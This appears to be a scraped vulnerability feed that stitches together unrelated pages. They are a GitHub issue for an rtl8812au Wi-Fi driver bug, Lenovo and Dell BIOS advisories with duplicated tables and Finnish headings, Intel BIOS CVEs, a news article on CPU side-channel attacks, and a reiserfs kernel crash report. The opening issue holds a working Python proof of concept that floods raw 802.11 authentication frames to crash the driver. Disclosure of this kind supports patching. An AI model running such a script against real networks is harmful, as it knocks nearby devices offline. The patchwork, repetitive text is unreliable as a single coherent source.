An issue was discovered in function nl80211_send_chandef in rtl8812au v5.6.4.2 allows attackers to cause a denial of service.

**testing environment**  
root@kali:~# uname -r  
5.6.0-kali2-amd64

**poc:**  
\`

#!/usr/bin/env python  
#coding=utf-8  
import time  
import socket

AP\_MAC = "00:22:66:88:22:00"  
STA\_MAC = "00:13:ef:f1:04:ef"  
ETH\_P\_ALL = 3  
IFACE = "wlan0"

def mac2str(mac):  
return "".join(map(lambda x: chr(int(x, 16)), mac.split(":")))

RADIO = "\\x00"  
RADIO += "\\x00"  
RADIO += "\\x24\\x00"  
RADIO += "\\x2f\\x40\\x00\\xa0"  
RADIO += "\\x20\\x08\\x00\\x00"  
RADIO += "\\x00\\x00\\x00\\x00"  
RADIO += "\\x27"  
RADIO += "\\x43"  
RADIO += "\\x6e\\x25"  
RADIO += "\\xa0\\x00"  
RADIO += "\\x00\\x00"  
RADIO += "\\x10\\x02"  
RADIO += "\\x6c\\x09"  
RADIO += "\\xa0\\x00"  
RADIO += "\\xd0\\x00"  
RADIO += "\\x00"  
RADIO += "\\x00"  
RADIO += "\\xd0"  
RADIO += "\\x00"

AUTH\_REQ\_OPEN = RADIO + "\\xB0" # Type/Subtype  
AUTH\_REQ\_OPEN += "\\x08" # Flags  
AUTH\_REQ\_OPEN += "\\xc3\\x50" # Duration ID  
AUTH\_REQ\_OPEN += mac2str(AP\_MAC) # Desti8nation address  
AUTH\_REQ\_OPEN += mac2str(STA\_MAC) # Source address  
AUTH\_REQ\_OPEN += mac2str(AP\_MAC) # BSSID  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Sequence control  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Authentication algorithm (open)  
AUTH\_REQ\_OPEN += "\\x01\\x00" # Authentication sequence number  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Authentication status  
AUTH\_REQ\_OPEN += "\\x1f\\xd8" # Authentication status  
AUTH\_REQ\_OPEN += "\\x5a\\x07" # Authentication status  
AUTH\_REQ\_HDR = AUTH\_REQ\_OPEN\[:-6\]

def start\_fuzz():  
s = socket.socket(socket.AF\_PACKET, socket.SOCK\_RAW, socket.htons(ETH\_P\_ALL))  
s.bind((IFACE, ETH\_P\_ALL))  
while True:  
print("send msg:",AUTH\_REQ\_OPEN)  
s.send(AUTH\_REQ\_OPEN)

def main():  
start\_fuzz()

if **name** == "**main**":  
main()  
\`  
when execute poc, we should turn on monitoring mode：  
ip link set wlan0 down  
iw dev wlan0 set type monitor  
ip link set wlan0 up

**result**

[  952.607304] WARNING: CPU: 0 PID: 1293 at net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] [  952.607304] Modules linked in: nfnetlink_queue(E) nfnetlink_log(E) 88XXau(OE) nfnetlink(E) bluetooth(E) drbg(E) ansi_cprng(E) ecdh_generic(E) ecc(E) cfg80211(E) rfkill(E) vsock_loopback(E) vmw_vsock_virtio_transport_common(E) vmw_vsock_vmci_transport(E) vsock(E) intel_rapl_msr(E) intel_rapl_common(E) intel_rapl_perf(E) vmw_balloon(E) joydev(E) serio_raw(E) pcspkr(E) sg(E) vmw_vmci(E) evdev(E) ac(E) binfmt_misc(E) fuse(E) sunrpc(E) ip_tables(E) x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) crc32c_generic(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E) crct10dif_pclmul(E) crct10dif_common(E) crc32_pclmul(E) crc32c_intel(E) ghash_clmulni_intel(E) hid_generic(E) usbhid(E) hid(E) sr_mod(E) cdrom(E) ata_generic(E) vmwgfx(E) aesni_intel(E) libaes(E) crypto_simd(E) cryptd(E) glue_helper(E) ttm(E) psmouse(E) drm_kms_helper(E) ata_piix(E) cec(E) uhci_hcd(E) ehci_pci(E) xhci_pci(E) xhci_hcd(E) e1000(E) ehci_hcd(E) usbcore(E) usb_common(E) mptspi(E) mptscsih(E) mptbase(E) [  952.607325]  scsi_transport_spi(E) drm(E) libata(E) i2c_piix4(E) scsi_mod(E) button(E) [  952.607329] CPU: 0 PID: 1293 Comm: RTW_CMD_THREAD Tainted: G           OE     5.6.0-kali2-amd64 #1 Debian 5.6.14-1kali1 [  952.607330] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/29/2019 [  952.607340] RIP: 0010:nl80211_send_chandef+0x14b/0x160 [cfg80211] [  952.607341] Code: 00 00 be a1 00 00 00 48 89 ef 89 44 24 04 e8 7c 8a 07 d6 85 c0 0f 84 7b ff ff ff 41 bc 97 ff ff ff e9 70 ff ff ff 31 c0 eb a7 <0f> 0b 41 bc ea ff ff ff e9 5f ff ff ff e8 c3 c7 cb d5 0f 1f 00 0f [  952.607342] RSP: 0018:ffffa687c088fd80 EFLAGS: 00010246 [  952.607343] RAX: 0000000000000000 RBX: ffffa687c088fe08 RCX: 0000000000000087 [  952.607343] RDX: 00000000c07597ec RSI: 00000000ffff259c RDI: ffffa687c088fe08 [  952.607344] RBP: ffff98e22da4dd00 R08: 0000000000000003 R09: 0000000000000004 [  952.607344] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa687c088fe08 [  952.607344] R13: 0000000000000000 R14: ffff98e22da4dd00 R15: ffff98e2343a3014 [  952.607345] FS:  0000000000000000(0000) GS:ffff98e23be00000(0000) knlGS:0000000000000000 [  952.607346] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [  952.607346] CR2: 00007f9224153030 CR3: 000000007a080005 CR4: 00000000002606f0 [  952.607365] Call Trace: [  952.607395]  nl80211_ch_switch_notify.constprop.0+0xcd/0x170 [cfg80211] [  952.607424]  rtw_cfg80211_ch_switch_notify+0x138/0x147 [88XXau] [  952.607440]  ? rtw_chk_start_clnt_join+0x79/0x79 [88XXau] [  952.607454]  rtw_chk_start_clnt_join+0x72/0x79 [88XXau] [  952.607468]  join_cmd_hdl+0x267/0x373 [88XXau] [  952.607476]  rtw_cmd_thread+0x295/0x3ed [88XXau] [  952.607494]  kthread+0xf9/0x130 [  952.607504]  ? rtw_stop_cmd_thread+0x39/0x39 [88XXau] [  952.607506]  ? kthread_park+0x90/0x90 [  952.607521]  ret_from_fork+0x35/0x40 [  952.607524] ---[ end trace c0d1960d55eb317c ]---

CVE-2020-26652: fuzzing wifi ,network will down,  result is net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] · Issue #730 · aircrack-ng/rtl8812au

A vulnerability was reported in BIOS for ThinkPad P14s Gen 2, P15s Gen 2, T14 Gen 2, and T15 Gen 2 that could cause the system to recover to insecure settings if the BIOS becomes corrupt.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources

**Resources**

*   Where to Buy
*   Shopping Help
*   Track Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | | |

CVE-2023-4030: Multi-vendor BIOS Security Vulnerabilities (August 2023) - Lenovo Support US


Dell BIOS contain a Time-of-check Time-of-use vulnerability in BIOS. A local authenticated malicious user with physical access to the system could potentially exploit this vulnerability by using a specifically timed DMA transaction during an SMI in order to gain arbitrary code execution on the system.



CVE-2023-28075: DSA-2023-152: Security Update for a Dell Client BIOS Vulnerability


Dell BIOS contains an improper authentication vulnerability. A malicious user with physical access to the system may potentially exploit this vulnerability in order to modify a security-critical UEFI variable without knowledge of the BIOS administrator.



**Vaikutus**

Medium

**Tiedot**

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32453

Dell BIOS contains an improper authentication vulnerability. A malicious user with physical access to the system may potentially exploit this vulnerability in order to modify a security-critical UEFI variable without knowledge of the BIOS administrator.

4.6

CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32453

Dell BIOS contains an improper authentication vulnerability. A malicious user with physical access to the system may potentially exploit this vulnerability in order to modify a security-critical UEFI variable without knowledge of the BIOS administrator.

4.6

CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

Product

Software/Firmware

Affected Versions

Remediated Versions

BIOS Release Date

Link

Alienware m15 R7

BIOS

Versions prior to 1.18.0

Version 1.18.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G15 5520

BIOS

Versions prior to 1.18.0

Version 1.18.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G16 7620

BIOS

Versions prior to 1.18.0

Version 1.18.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G3 3500

BIOS

Versions prior to 1.26.0

Version 1.26.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G5 15 5500

BIOS

Versions prior to 1.26.0

Version 1.26.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 24 5420 All-in-One  
Inspiron 24 5421 All-in-One

BIOS

Versions prior to 1.4.0

Version 1.4.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 27 7720 All-in-One

BIOS

Versions prior to 1.4.0

Version 1.4.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 3493

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 3593

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 3793

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 5493

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 5593

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 7490

BIOS

Versions prior to 1.22.0

Version 1.22.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Latitude 3140

BIOS

Versions prior to 1.8.0

Version 1.8.0 or later

07/28/2023

Go to the Drivers & Downloads site for updates.

Latitude 7230 Rugged Extreme Tablet

BIOS

Versions prior to 1.8.0

Version 1.8.0 or later

07/31/2023

Go to the Drivers & Downloads site for updates.

OptiPlex 7090

BIOS

Versions prior to 1.19.0

Version 1.19.0 or later

08/03/2023

Go to the Drivers & Downloads site for updates.

Precision 3450

BIOS

Versions prior to 1.19.0

Version 1.19.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Precision 7960 Tower

BIOS

Versions prior to 1.0.8

Version 1.0.8 or later

07/07/2023

Go to the Drivers & Downloads site for updates.

Vostro 5491

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Vostro 5591

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Vostro 5890

BIOS

Versions prior to 1.19.0

Version 1.19.0 or later

08/03/2023

Go to the Drivers & Downloads site for updates.

Product

Software/Firmware

Affected Versions

Remediated Versions

BIOS Release Date

Link

Alienware m15 R7

BIOS

Versions prior to 1.18.0

Version 1.18.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G15 5520

BIOS

Versions prior to 1.18.0

Version 1.18.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G16 7620

BIOS

Versions prior to 1.18.0

Version 1.18.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G3 3500

BIOS

Versions prior to 1.26.0

Version 1.26.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G5 15 5500

BIOS

Versions prior to 1.26.0

Version 1.26.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 24 5420 All-in-One  
Inspiron 24 5421 All-in-One

BIOS

Versions prior to 1.4.0

Version 1.4.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 27 7720 All-in-One

BIOS

Versions prior to 1.4.0

Version 1.4.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 3493

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 3593

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 3793

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 5493

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 5593

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 7490

BIOS

Versions prior to 1.22.0

Version 1.22.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Latitude 3140

BIOS

Versions prior to 1.8.0

Version 1.8.0 or later

07/28/2023

Go to the Drivers & Downloads site for updates.

Latitude 7230 Rugged Extreme Tablet

BIOS

Versions prior to 1.8.0

Version 1.8.0 or later

07/31/2023

Go to the Drivers & Downloads site for updates.

OptiPlex 7090

BIOS

Versions prior to 1.19.0

Version 1.19.0 or later

08/03/2023

Go to the Drivers & Downloads site for updates.

Precision 3450

BIOS

Versions prior to 1.19.0

Version 1.19.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Precision 7960 Tower

BIOS

Versions prior to 1.0.8

Version 1.0.8 or later

07/07/2023

Go to the Drivers & Downloads site for updates.

Vostro 5491

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Vostro 5591

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Vostro 5890

BIOS

Versions prior to 1.19.0

Version 1.19.0 or later

08/03/2023

Go to the Drivers & Downloads site for updates.

**Versiohistoria**

Revision

Date

Description

1.0

2023-08-08

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Lisätietoja**

**NOTE:** The Affected Products and Remediation table above may not be a comprehensive list of all affected supported versions and may be updated as more information becomes available.

Alienware m15 R7, Dell G5 15 5500, Dell G15 5520, Dell G16 7620, Inspiron 3493, Inspiron 3593, Inspiron 3793, Inspiron 24 5420 All-in-One, Inspiron 24 5421 All-in-One, Inspiron 27 7720 All-in-One

Inspiron 5493, Inspiron 7490, Inspiron 5593, Latitude 3140, Latitude 7230 Rugged Extreme Tablet, OptiPlex 7090 Micro, OptiPlex 7090 Small Form Factor, OptiPlex 7090 Ultra, Precision 3450 XE Small Form Factor, Precision 3450 Small Form Factor , Precision 7960 Tower, Vostro 5890 ...

09 elok. 2023

CVE-2023-32453: DSA-2023-190: Security Update for a Dell Client BIOS Vulnerability

Improper buffer restrictions in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.

CVE-2022-27879

Improper input validation in firmware for some Intel(R) PCSD BIOS before version 02.01.0013 may allow a privileged user to potentially enable information disclosure via local access.

CVE-2022-34657

Race condition in some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

CVE-2023-34438

Exposure of sensitive information to an unauthorized actor in BIOS firmware for some Intel(R) NUCs may allow a privilege user to potentially enable information disclosure via local access.

CVE-2023-29500

Cybersecurity researchers have disclosed details of a trio of side-channel attacks that could be exploited to leak sensitive data from modern CPUs.
Called Collide+Power (CVE-2023-20583), Downfall (CVE-2022-40982), and Inception (CVE-2023-20569), the novel methods follow the disclosure of another newly discovered security vulnerability affecting AMD's Zen 2 architecture-based processors known as

Cybersecurity researchers have disclosed details of a trio of side-channel attacks that could be exploited to leak sensitive data from modern CPUs.

Called **Collide+Power** (CVE-2023-20583), **Downfall** (CVE-2022-40982), and **Inception** (CVE-2023-20569), the novel methods follow the disclosure of another newly discovered security vulnerability affecting AMD's Zen 2 architecture-based processors known as Zenbleed (CVE-2023-20593).

"Downfall attacks target a critical weakness found in billions of modern processors used in personal and cloud computers," Daniel Moghimi, senior research scientist at Google, said. "This vulnerability \[...\] enables a user to access and steal data from other users who share the same computer."

In a hypothetical attack scenario, a malicious app installed on a device could weaponize the method to steal sensitive information like passwords and encryption keys, effectively undermining Intel's Software Guard eXtensions (SGX) protections.

The problem is rooted in the memory optimization features introduced by Intel in its processors, specifically those with AVX2 and AVX-512 instruction sets, thereby causing untrusted software to get past isolation barriers and access data stored by other programs.

This, in turn, is achieved by means of two transient execution attack techniques called Gather Data Sampling (GDS) and Gather Value Injection (GVI), the latter of which combines GDS with Load Value Injection (LVI).

"\[Downfall and Zenbleed\] allow an attacker to violate the software-hardware boundary established in modern processors," Tavis Ormandy and Moghimi noted. "This could allow an attacker to access data in internal hardware registers that hold information belonging to other users of the system (both across different virtual machines and different processes)."

Intel described Downfall (aka GDS) as a medium severity flaw that could result in information disclosure. It's also releasing a microcode update to mitigate the problem, although there is a possibility of a 50% performance reduction. The full list of affected models is available here.

If anything, the discovery of Downfall underscores the need for balancing security and performance optimization demands.

"Optimization features that are supposed to make computation faster are closely related to security and can introduce new vulnerabilities, if not implemented properly," Ormandy and Moghimi said.

In a related development, the chipmaker also moved to address a number of flaws, including a privilege escalation bug in the BIOS firmware for some Intel(R) Processors (CVE-2022-44611) that arises as a result of improper input validation.

"A remote attacker that is positioned within Bluetooth proximity to the victim device can corrupt BIOS memory by sending malformed \[Human Interface Device\] Report structures," NCC Group security researcher Jeremy Boone said.

Coinciding with Downfall is Inception, a transient execution attack that leaks arbitrary kernel memory on all AMD Zen CPUs, including the latest Zen 4 processors, at a rate of 39 bytes/s.

"As in the movie of the same name, Inception plants an 'idea' in the CPU while it is in a sense 'dreaming,' to make it take wrong actions based on supposedly self conceived experiences," ETH Zurich researchers said.

"Using this approach, Inception hijacks the transient control-flow of return instructions on all AMD Zen CPUs."

The approach is an amalgamation of Phantom speculation (CVE-2022-23825) and Training in Transient Execution (TTE), allowing for information disclosure along the lines of branch prediction-based attacks like Spectre-V2 and Retbleed.

"Inception makes the CPU believe that a XOR instruction is a recursive call instruction which overflows the return stack buffer with an attacker-controlled target," the researchers explained.

AMD, besides providing microcode patches and other mitigations, said the vulnerability is "only potentially exploitable locally, such as via downloaded malware, and recommends customers employ security best practices, including running up-to-date software and malware detection tools."

It's worth noting that a fix for CVE-2022-23825 was rolled out by Microsoft as part of its July 2022 Patch Tuesday updates. CVE-2023-20569 has been addressed in Microsoft's August 2023 Security Updates.

Rounding off the side-channel attacks is an unconventional software-based method dubbed Collide+Power, which works against devices powered by all processors and could be abused to leak arbitrary data across programs as well as from any security domain at a rate of up to 188.80 bits/h.

"The root of the problem is that shared CPU components, like the internal memory system, combine attacker data and data from any other application, resulting in a combined leakage signal in the power consumption," a group of academics from the Graz University of Technology and CISPA Helmholtz Center for Information Security said.

"Thus, knowing its own data, the attacker can determine the exact data values used in other applications."

In other words, the idea is to force a collision between attacker-controlled data, via malware planted on the targeted device, and the secret information associated with a victim program in the shared CPU cache memory.

"The leakage rates of Collide+Power are relatively low with the current state-of-the-art, and it is highly unlikely to be a target of a Collide+Power attack as an end-user," the researchers pointed out.

"Since Collide+Power is a technique independent of the power-related signal, possible mitigations must be deployed at a hardware level to prevent the exploited data collisions or at a software or hardware level to prevent an attacker from observing the power-related signal."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Collide+Power, Downfall, and Inception: New Side-Channel Attacks Affecting Modern CPUs

An out-of-bounds memory access flaw was found in the Linux kernel’s do_journal_end function when the fails array-index-out-of-bounds in fs/reiserfs/journal.c could happen. This flaw allows a local user to crash the system.

Hello,

When using Healer to fuzz the latest Linux kernel, the following crash
was triggered.

HEAD commit: fdf0eaf11452d72945af31804e2a1048ee1b574c (tag: v6.5-rc2)

git tree: upstream

console output:
https://drive.google.com/file/d/1rvB5Fwc85GjfGwkk0bcYKZksB5l-\_nOX/view?usp=drive\_link
kernel config: https://drive.google.com/file/d/1V146PezNdRzu1BRVfwwYsIwNCZvAOBxJ/view?usp=drive\_link
C reproducer: https://drive.google.com/file/d/1FLDqzxv4t92J7EMPqQdkg6ca6XtZJhCd/view?usp=drive\_link
Syzlang reproducer:
https://drive.google.com/file/d/1uPPRLIylpS116iXrlHMzKNga-fBwRAo1/view?usp=drive\_link
Similar report:
https://groups.google.com/g/syzkaller-bugs/c/osuwOxyjReQ/m/-FJKSzllAQAJ

If you fix this issue, please add the following tag to the commit:
Reported-by: Yikebaer Aizezi <yikebaer61@xxxxxxxxx>

UBSAN: array-index-out-of-bounds in fs/reiserfs/journal.c:4166:22
index 1 is out of range for type '\_\_le32 \[1\]'
CPU: 0 PID: 8058 Comm: syz-executor Not tainted 6.5.0-rc2 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014
Call Trace:
 <TASK>
 \_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
 dump\_stack\_lvl+0xd4/0xf0 lib/dump\_stack.c:106
 ubsan\_epilogue lib/ubsan.c:217 \[inline\]
 \_\_ubsan\_handle\_out\_of\_bounds+0xbf/0x100 lib/ubsan.c:348
 do\_journal\_end+0x3b3c/0x4750 fs/reiserfs/journal.c:4166
 reiserfs\_sync\_fs+0xe7/0x100 fs/reiserfs/super.c:78
 sync\_filesystem fs/sync.c:56 \[inline\]
 sync\_filesystem+0xef/0x250 fs/sync.c:30
 generic\_shutdown\_super+0x70/0x470 fs/super.c:472
 kill\_block\_super+0x60/0xb0 fs/super.c:1417
 deactivate\_locked\_super+0x85/0x140 fs/super.c:330
 deactivate\_super+0x8c/0xa0 fs/super.c:361
 cleanup\_mnt+0x28f/0x3b0 fs/namespace.c:1254
 task\_work\_run+0x153/0x230 kernel/task\_work.c:179
 resume\_user\_mode\_work include/linux/resume\_user\_mode.h:49 \[inline\]
 exit\_to\_user\_mode\_loop kernel/entry/common.c:171 \[inline\]
 exit\_to\_user\_mode\_prepare+0x210/0x240 kernel/entry/common.c:204
 \_\_syscall\_exit\_to\_user\_mode\_work kernel/entry/common.c:286 \[inline\]
 syscall\_exit\_to\_user\_mode+0x19/0x50 kernel/entry/common.c:297
 do\_syscall\_64+0x42/0xb0 arch/x86/entry/common.c:86
 entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
RIP: 0033:0x47afab
Code: 5f ff d0 48 89 c7 b8 3c 00 00 00 0f 05 48 c7 c1 b4 ff ff ff f7
d8 64 89 01 48 83 c8 ff c3 90 f3 0f 1e fa b8 a6 00 00 00 0f 05 <48> 3d
00 f0 ff ff 77 05 c3 0f 1f 40 00 48 c7 c2 b4 ff ff ff f7 d8
RSP: 002b:00007ffe61655568 EFLAGS: 00000246 ORIG\_RAX: 00000000000000a6
RAX: 0000000000000000 RBX: 00000000000001fc RCX: 000000000047afab
RDX: 0000000000000000 RSI: 0000000000000002 RDI: 00007ffe61655610
RBP: 0000000000000000 R08: 0000000000000000 R09: 00007ffe61655400
R10: 00000000025d1b03 R11: 0000000000000246 R12: 00007ffe616566d0
R13: 00000000025d1a70 R14: 0000000000000000 R15: 00007ffe61656710
 </TASK>
================================================================================

TITLE: kernel panic: UBSAN: panic\_on\_warn set ...
CORRUPTED: false ()
MAINTAINERS (TO): \[reiserfs-devel@xxxxxxxxxxxxxxx\]
MAINTAINERS (CC): \[linux-kernel@xxxxxxxxxxxxxxx\]

index 1 is out of range for type '\_\_le32 \[1\]'
CPU: 0 PID: 8058 Comm: syz-executor Not tainted 6.5.0-rc2 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014
Call Trace:
 <TASK>
 \_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
 dump\_stack\_lvl+0xd4/0xf0 lib/dump\_stack.c:106
 ubsan\_epilogue lib/ubsan.c:217 \[inline\]
 \_\_ubsan\_handle\_out\_of\_bounds+0xbf/0x100 lib/ubsan.c:348
 do\_journal\_end+0x3b3c/0x4750 fs/reiserfs/journal.c:4166
 reiserfs\_sync\_fs+0xe7/0x100 fs/reiserfs/super.c:78
 sync\_filesystem fs/sync.c:56 \[inline\]
 sync\_filesystem+0xef/0x250 fs/sync.c:30
 generic\_shutdown\_super+0x70/0x470 fs/super.c:472
 kill\_block\_super+0x60/0xb0 fs/super.c:1417
 deactivate\_locked\_super+0x85/0x140 fs/super.c:330
 deactivate\_super+0x8c/0xa0 fs/super.c:361
 cleanup\_mnt+0x28f/0x3b0 fs/namespace.c:1254
 task\_work\_run+0x153/0x230 kernel/task\_work.c:179
 resume\_user\_mode\_work include/linux/resume\_user\_mode.h:49 \[inline\]
 exit\_to\_user\_mode\_loop kernel/entry/common.c:171 \[inline\]
 exit\_to\_user\_mode\_prepare+0x210/0x240 kernel/entry/common.c:204
 \_\_syscall\_exit\_to\_user\_mode\_work kernel/entry/common.c:286 \[inline\]
 syscall\_exit\_to\_user\_mode+0x19/0x50 kernel/entry/common.c:297
 do\_syscall\_64+0x42/0xb0 arch/x86/entry/common.c:86
 entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
RIP: 0033:0x47afab
Code: 5f ff d0 48 89 c7 b8 3c 00 00 00 0f 05 48 c7 c1 b4 ff ff ff f7
d8 64 89 01 48 83 c8 ff c3 90 f3 0f 1e fa b8 a6 00 00 00 0f 05 <48> 3d
00 f0 ff ff 77 05 c3 0f 1f 40 00 48 c7 c2 b4 ff ff ff f7 d8
RSP: 002b:00007ffe61655568 EFLAGS: 00000246 ORIG\_RAX: 00000000000000a6
RAX: 0000000000000000 RBX: 00000000000001fc RCX: 000000000047afab
RDX: 0000000000000000 RSI: 0000000000000002 RDI: 00007ffe61655610
RBP: 0000000000000000 R08: 0000000000000000 R09: 00007ffe61655400
R10: 00000000025d1b03 R11: 0000000000000246 R12: 00007ffe616566d0
R13: 00000000025d1a70 R14: 0000000000000000 R15: 00007ffe61656710
 </TASK>
================================================================================
Kernel panic - not syncing: UBSAN: panic\_on\_warn set ...
CPU: 0 PID: 8058 Comm: syz-executor Not tainted 6.5.0-rc2 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014
Call Trace:
 <TASK>
 \_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
 dump\_stack\_lvl+0x92/0xf0 lib/dump\_stack.c:106
 panic+0x570/0x620 kernel/panic.c:340
 check\_panic\_on\_warn+0x8e/0x90 kernel/panic.c:236
 ubsan\_epilogue lib/ubsan.c:223 \[inline\]
 \_\_ubsan\_handle\_out\_of\_bounds+0xe7/0x100 lib/ubsan.c:348
 do\_journal\_end+0x3b3c/0x4750 fs/reiserfs/journal.c:4166
 reiserfs\_sync\_fs+0xe7/0x100 fs/reiserfs/super.c:78
 sync\_filesystem fs/sync.c:56 \[inline\]
 sync\_filesystem+0xef/0x250 fs/sync.c:30
 generic\_shutdown\_super+0x70/0x470 fs/super.c:472
 kill\_block\_super+0x60/0xb0 fs/super.c:1417
 deactivate\_locked\_super+0x85/0x140 fs/super.c:330
 deactivate\_super+0x8c/0xa0 fs/super.c:361
 cleanup\_mnt+0x28f/0x3b0 fs/namespace.c:1254
 task\_work\_run+0x153/0x230 kernel/task\_work.c:179
 resume\_user\_mode\_work include/linux/resume\_user\_mode.h:49 \[inline\]
 exit\_to\_user\_mode\_loop kernel/entry/common.c:171 \[inline\]
 exit\_to\_user\_mode\_prepare+0x210/0x240 kernel/entry/common.c:204
 \_\_syscall\_exit\_to\_user\_mode\_work kernel/entry/common.c:286 \[inline\]
 syscall\_exit\_to\_user\_mode+0x19/0x50 kernel/entry/common.c:297
 do\_syscall\_64+0x42/0xb0 arch/x86/entry/common.c:86
 entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
RIP: 0033:0x47afab
Code: 5f ff d0 48 89 c7 b8 3c 00 00 00 0f 05 48 c7 c1 b4 ff ff ff f7
d8 64 89 01 48 83 c8 ff c3 90 f3 0f 1e fa b8 a6 00 00 00 0f 05 <48> 3d
00 f0 ff ff 77 05 c3 0f 1f 40 00 48 c7 c2 b4 ff ff ff f7 d8
RSP: 002b:00007ffe61655568 EFLAGS: 00000246 ORIG\_RAX: 00000000000000a6
RAX: 0000000000000000 RBX: 00000000000001fc RCX: 000000000047afab
RDX: 0000000000000000 RSI: 0000000000000002 RDI: 00007ffe61655610
RBP: 0000000000000000 R08: 0000000000000000 R09: 00007ffe61655400
R10: 00000000025d1b03 R11: 0000000000000246 R12: 00007ffe616566d0
R13: 00000000025d1a70 R14: 0000000000000000 R15: 00007ffe61656710
 </TASK>
Dumping ftrace buffer:
   (ftrace buffer empty)
Kernel Offset: disabled
Rebooting in 1 seconds..

Tag

#bios